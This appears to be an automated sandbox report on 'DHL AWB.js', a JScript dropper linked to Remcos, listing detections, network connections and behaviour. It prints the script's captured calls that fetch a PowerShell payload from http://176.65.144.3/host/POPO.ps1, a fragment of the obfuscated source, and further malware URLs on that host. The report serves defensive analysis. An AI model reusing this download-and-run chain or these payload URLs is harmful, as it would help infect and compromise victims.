Edit tour

Windows Analysis Report
DHL AWB.js

Overview

General Information

Sample name:DHL AWB.js
Analysis ID:1646997
MD5:6e4db484b0e33d5b78a806ffe1e1a86e
SHA1:f54e823f9055e43eaf07a6c0a3a0ba8bed217c8b
SHA256:b2765e4aff6a0ab889043a7f49066d9032c68cf8814a392848433add74b1895a
Tags:DHLjsRATRemcosRATuser-abuse_ch
Infos:

Detection

Score:84
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • wscript.exe (PID: 6528 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6528, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49681
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", ProcessId: 6528, ProcessName: wscript.exe
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 176.65.144.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6528, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49681
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js", ProcessId: 6528, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://176.65.144.3/host/POPO.ps1Avira URL Cloud: Label: malware
Source: DHL AWB.jsVirustotal: Detection: 16%Perma Link
Source: DHL AWB.jsReversingLabs: Detection: 13%

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
Source: Joe Sandbox ViewIP Address: 176.65.144.3 176.65.144.3
Source: Joe Sandbox ViewASN Name: PALTEL-ASPALTELAutonomousSystemPS PALTEL-ASPALTELAutonomousSystemPS
Source: global trafficTCP traffic: 192.168.2.7:49681 -> 176.65.144.3:80
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
Source: wscript.exe, 00000000.00000003.1140469713.00000291FA0FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135530818.00000291FA2BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135398137.00000291FA158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135456091.00000291FBF45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1142045178.00000291FBF55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135284648.00000291FA19E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1141793030.00000291FA19E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1139175788.00000291FBF37000.00000004.00000020.00020000.00000000.sdmp, DHL AWB.jsString found in binary or memory: http://176.65.144.3/host/POPO.ps1
Source: wscript.exe, 00000000.00000002.1141759573.00000291FA166000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135415284.00000291FA165000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135398137.00000291FA158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/host/POPO.ps1R4
Source: wscript.exe, 00000000.00000003.1135966794.00000291FA19E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135284648.00000291FA19E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1141793030.00000291FA19E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
Source: DHL AWB.jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal84.evad.winJS@1/0@0/1
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: DHL AWB.jsVirustotal: Detection: 16%
Source: DHL AWB.jsReversingLabs: Detection: 13%
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Source: C:\Windows\System32\wscript.exeAutomated click: OK
Source: C:\Windows\System32\wscript.exeAutomated click: OK

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IHost.CreateObject("Scripting.FileSystemObject");IHost.CreateObject("MSXML2.XMLHTTP");IFileSystem3.FolderExists("C:\Temp");IFileSystem3.CreateFolder("C:\Temp");IServerXMLHTTPRequest2.open("GET", "http://176.65.144.3/host/POPO.ps1", "false");IServerXMLHTTPRequest2.send()
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: wscript.exe, 00000000.00000003.1135966794.00000291FA173000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1141793030.00000291FA173000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1142091243.00000291FC1A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135284648.00000291FA16F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1135966794.00000291FA173000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1141793030.00000291FA173000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135284648.00000291FA16F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB.
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information12
Scripting
Valid AccountsWindows Management Instrumentation12
Scripting
1
Process Injection
1
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
DLL Side-Loading
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1646997 Sample: DHL AWB.js Startdate: 24/03/2025 Architecture: WINDOWS Score: 84 11 Antivirus detection for URL or domain 2->11 13 Multi AV Scanner detection for submitted file 2->13 15 Sigma detected: WScript or CScript Dropper 2->15 17 Sigma detected: Script Initiated Connection to Non-Local Network 2->17 5 wscript.exe 1 13 2->5         started        process3 dnsIp4 9 176.65.144.3, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 5->9 19 System process connects to network (likely due to code injection or exploit) 5->19 21 JScript performs obfuscated calls to suspicious functions 5->21 23 Windows Scripting host queries suspicious COM object (likely to drop second stage) 5->23 signatures5

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
DHL AWB.js16%VirustotalBrowse
DHL AWB.js14%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://176.65.144.3/host/POPO.ps1R40%Avira URL Cloudsafe
http://176.65.144.3/host/POPO.ps1100%Avira URL Cloudmalware

Download Network PCAP: filteredfull

No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://176.65.144.3/host/POPO.ps1R4wscript.exe, 00000000.00000002.1141759573.00000291FA166000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135415284.00000291FA165000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135398137.00000291FA158000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://176.65.144.3/host/POPO.ps1wscript.exe, 00000000.00000003.1140469713.00000291FA0FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135530818.00000291FA2BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135398137.00000291FA158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135456091.00000291FBF45000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1142045178.00000291FBF55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1135284648.00000291FA19E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1141793030.00000291FA19E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1139175788.00000291FBF37000.00000004.00000020.00020000.00000000.sdmp, DHL AWB.jstrue
  • Avira URL Cloud: malware
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
176.65.144.3
unknownGermany
12975PALTEL-ASPALTELAutonomousSystemPStrue
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1646997
Start date and time:2025-03-24 13:46:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 11s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:Without Instrumentation
Number of analysed new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:DHL AWB.js
Detection:MAL
Classification:mal84.evad.winJS@1/0@0/1
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .js
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 52.149.20.212, 184.31.69.3
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
176.65.144.3#U4ed8#U6b3e#U6c47#U6b3e#U901a#U77e5.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3/host/kent.exe
xenn.ps1Get hashmaliciousRedLineBrowse
  • 176.65.144.3/dev/xenbuild.exe
Confirmaci#U00f3n de Pago.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3/FILE/KENNNTTT.ps1
STEPH.jsGet hashmaliciousFormBookBrowse
  • 176.65.144.3/FILE/STEPH.ps1
Rendel#U00e9si k#U00e9relem.exeGet hashmaliciousDarkCloudBrowse
  • 176.65.144.3/dev/fireballs.exe
MUKK.ps1Get hashmaliciousAgentTeslaBrowse
  • 176.65.144.3/dev/muhk.exe
obfuscated (1).jsGet hashmaliciousXWormBrowse
  • 176.65.144.3/dev/BRAINN.exe
KIM.ps1Get hashmaliciousStealeriumBrowse
  • 176.65.144.3/dev/Cooperbuild34.exe
KENT.ps1Get hashmaliciousRemcosBrowse
  • 176.65.144.3/dev/kent.exe
VIK.ps1.vir.txt.ps1Get hashmaliciousAgentTeslaBrowse
  • 176.65.144.3/dev/DONORIGIN.exe
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
PALTEL-ASPALTELAutonomousSystemPS#U4ed8#U6b3e#U6c47#U6b3e#U901a#U77e5.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3
owari.spc.elfGet hashmaliciousUnknownBrowse
  • 213.6.206.42
SecuriteInfo.com.Win32.Trojan.Agent.QWCKHW.31433.26307.exeGet hashmaliciousUnknownBrowse
  • 176.65.138.157
xenn.ps1Get hashmaliciousRedLineBrowse
  • 176.65.144.135
Confirmaci#U00f3n de Pago.jsGet hashmaliciousRemcosBrowse
  • 176.65.144.3
STEPH.jsGet hashmaliciousFormBookBrowse
  • 176.65.144.3
nabppc.elfGet hashmaliciousUnknownBrowse
  • 82.213.50.193
Rendel#U00e9si k#U00e9relem.exeGet hashmaliciousDarkCloudBrowse
  • 176.65.144.3
MUKK.ps1Get hashmaliciousAgentTeslaBrowse
  • 176.65.144.3
No context
No context
No created / dropped files found
File type:ASCII text, with very long lines (2087), with no line terminators
Entropy (8bit):5.7039875139870455
TrID:
    File name:DHL AWB.js
    File size:2'087 bytes
    MD5:6e4db484b0e33d5b78a806ffe1e1a86e
    SHA1:f54e823f9055e43eaf07a6c0a3a0ba8bed217c8b
    SHA256:b2765e4aff6a0ab889043a7f49066d9032c68cf8814a392848433add74b1895a
    SHA512:af74cd508f3ddd6e3defa139e54798f53ba370c99c47c7e1383edeaac4652cfcf0eaa106b05f0ffdd8e3196d904ec5c98b034f71c1e72130ddcb30a834143f60
    SSDEEP:48:qyxHNhwb0Z0JovXQwKphyn4T+t6U08kSnmmGCTgWJDLfcpJw:9tSb0W7wyknxr/GegEYw
    TLSH:114161EE3F24E08C8757476B9E2F441DEA71D84429E1C512D2A2A9C9FC14370EE3B726
    File Content Preview:function a(){var m=['message','523362EaabQf','680259YMcTyC','Exiting\x20script\x20due\x20to\x20download\x20failure.','Scripting.FileSystemObject','CreateObject','Run','Echo','19478fjLYJG','Status','10Zjgbgr','985635JFbYNr','MSXML2.XMLHTTP','PowerShell\x20
    Icon Hash:68d69b8bb6aa9a86

    Download Network PCAP: filteredfull

    TimestampSource PortDest PortSource IPDest IP
    Mar 24, 2025 13:47:06.306874990 CET4968180192.168.2.7176.65.144.3
    Mar 24, 2025 13:47:07.321213961 CET4968180192.168.2.7176.65.144.3
    Mar 24, 2025 13:47:09.336862087 CET4968180192.168.2.7176.65.144.3
    Mar 24, 2025 13:47:13.352612972 CET4968180192.168.2.7176.65.144.3
    Mar 24, 2025 13:47:21.352463961 CET4968180192.168.2.7176.65.144.3
    050100s020406080100

    Click to jump to process

    050100s0.005101520MB

    Click to jump to process

    • File
    • Registry

    Click to dive into process behavior distribution

    Target ID:0
    Start time:08:47:05
    Start date:24/03/2025
    Path:C:\Windows\System32\wscript.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL AWB.js"
    Imagebase:0x7ff6e4c40000
    File size:170'496 bytes
    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
    Has elevated privileges:false
    Has administrator privileges:false
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

    No disassembly